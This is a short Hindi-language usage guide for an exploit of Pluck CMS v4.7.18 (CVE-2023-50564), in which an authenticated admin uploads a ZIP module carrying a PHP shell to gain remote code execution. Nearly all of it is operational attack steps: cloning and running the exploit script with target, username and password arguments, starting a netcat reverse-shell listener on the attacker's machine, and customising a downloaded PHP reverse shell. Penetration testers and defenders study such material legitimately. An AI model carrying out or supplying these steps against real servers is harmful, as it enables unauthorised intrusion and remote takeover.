
Pluck v4.7.18 - रिमोट कोड एक्ज़ीक्यूशन (RCE)
यह एक्सप्लॉइट Pluck CMS v4.7.18 में एक प्रमाणित व्यवस्थापक को एक दुर्भावनापूर्ण ZIP मॉड्यूल अपलोड करने की अनुमति देता है, जिसमें PHP शेल होता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन (RCE) होता है।
installmodule एंडपॉइंट पर अपलोड करता हैgit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
सबसे पहले, हमलावर मशीन पर रिवर्स शेल लिसनर शुरू किया जाना चाहिए (टर्मिनल का यह टैब समाप्त नहीं किया जाना चाहिए):
nc -nvlp <specify port>
फिर, https://github.com/pentestmonkey/php-reverse-shell से PHP रिवर्स शेल डाउनलोड करें और इसे हमलावर मशीन के अनुसार कस्टमाइज़ करें। (IP, port)
एक्सप्लॉइट कोड को दूसरे टैब पर चलाएँ:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php